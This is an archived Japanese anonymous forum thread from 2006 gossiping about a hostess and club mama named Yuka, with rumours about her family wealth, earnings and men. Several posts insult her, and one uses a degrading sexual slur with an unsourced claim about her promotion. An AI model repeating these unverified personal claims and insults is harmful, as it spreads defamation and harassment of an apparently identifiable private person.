179 :無名モデル:2006/12/22(金) 17:32:50 ID:???
だろうね!ブランド知らない人間がゆかの事語るってのも…
なんせ金かかる女ですから!

180 :無名モデル:2006/12/22(金) 18:45:11 ID:D8/7iU62
そぅなんですか☆
けどお金持ちって羨ましい☆
ゴージャスなュカさん見てみたかった
私みたいなんがユカって人のこと語るのゎ間違ってますよね
ごめんなさぃ


181 :無名モデル:2006/12/22(金) 19:39:30 ID:QvybJM1j
店に遊びに行ったことあるけど、ここで騒いでいるぐらいさほどゴージャスではないよ。なんか場末のスナックの女みたいで汚らしい感じだった。同じ店のホステスの方がゴージャスで品があって清潔感あったよ。

182 :無名モデル:2006/12/22(金) 21:18:03 ID:???
男から相当金もらってる癖に…なんしに働くの?
ほんまあほやっぱり
ばかお嬢様だからね〜

183 :無名モデル:2006/12/23(土) 19:19:25 ID:???
由華ちゃんはアホ違うよ!ばかか北新地の一流クラブでママはれないよ!
良い時悪い時はあるだろうけど平均小計500以上はうってるしママとしては若いし綺麗し歳のいったママとは違い力のある立派なママです。
これから一番伸びていくママだとみんな言ってますね!まだ若いから大半が由華ちゃんで客が来てるみたいだけど…体は一つ
ヘルプをもっと上手く使いこなせば誰も彼女には勝てないね!
無敵だと思う!

184 :無名モデル:2006/12/23(土) 20:51:43 ID:???

あんた黒服だね。

185 :無名モデル:2006/12/23(土) 23:01:42 ID:???
エロイやりたい!

186 :無名モデル:2006/12/24(日) 15:30:38 ID:???
メリークリスマス!
愛するゆかりん

187 :無名モデル:2006/12/24(日) 17:33:12 ID:???
ゆかりんイブだぜ〜
メリクリ〜

188 :無名モデル:2006/12/25(月) 01:24:27 ID:???
ゆかはどうせ今頃彼氏と一緒だろうな…
うざい

189 :無名モデル:2006/12/25(月) 18:48:44 ID:???
ゆかのサンタさんになりたいなり〜

190 :無名モデル:2006/12/26(火) 01:36:03 ID:fely0CVy
店の代表の肉便器だから、ママになれたんだろ?由華のヘルプが言ってたぞ。 意外に慕われて無いんだと思ったw

191 :無名モデル:2006/12/26(火) 06:54:10 ID:???
ハイハイ由華に干されたヘルプの話かいなw
あのタイプのママは妬まれるからしゃあないけど真実味ないからおもんない
君はそういう発想する事態そこまでしてもママにはなれなかったのか?w気の毒だなと言うたれば妄想で由華のヘルプと思ってるホスにwww

192 :無名モデル:2006/12/26(火) 07:39:04 ID:???
確かに!同じくおもんない!
ハンパじゃなく気きついし怖いこの金食い虫女!
金あってもなくなったら用事なしというような女やで!
計算高いしかなりの高飛車!させへんし最悪!
この子不細工やったら
生きてないと思うわ〜

193 :無名モデル:2006/12/26(火) 07:43:31 ID:???

おい!おちつけ―
クリスマスプレゼントだけとられてふられたんか?

194 :無名モデル:2006/12/26(火) 07:47:59 ID:wGGqA9I3
お嬢さんなの?

195 :無名モデル:2006/12/26(火) 16:18:27 ID:NskjhjGm
両親は自社ビルなど…
多数もってるし神戸の財閥の孫だけど…
由華本人は親の七光りで偉そうにしてるただのばかお嬢だったが…
昔から要領とずる賢さは天下一自分で金儲け覚えたみたいだし怖い存在だね

196 :無名モデル:2006/12/26(火) 17:24:41 ID:???
金持ちの娘が金儲けしてわるいか?僻みみっともないで
由華ちゃん情のある良い子だしふられた男とか男とられた女がほざくなって!悔しいのかw
顔スタイルヨシ!おまけに金持ちの娘でいい男もいて何もかも恵まれてるし普通は羨ましいと思う!

197 :無名モデル:2006/12/26(火) 19:19:11 ID:???
この子身内だけには情あるかもしれんが本間に敵にしたらどんな人間でも潰していく。。。
たちワル女

198 :無名モデル:2006/12/26(火) 20:43:04 ID:???
黒幕
怖い
ガクガク ブルブル

199 :無名モデル:2006/12/27(水) 08:07:46 ID:???
この子どこまでがめついんやろ?
何で働く必要あるの?
オーディションの時も凄いオーラあってセレブって感じの子で印象的で覚えてるけど
態度生意気で神戸の金持ちの娘でお母さんにお世話になってるって事で仕事
とっていってた
親の力使ってなんかみんな妬んでた
今お水のママやってると聞き天性の仕事だと思うが…
男から数百万毎月もらってたのは有名な話
おまけに自分の給料どれくらいもらってるんだろう?

32 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)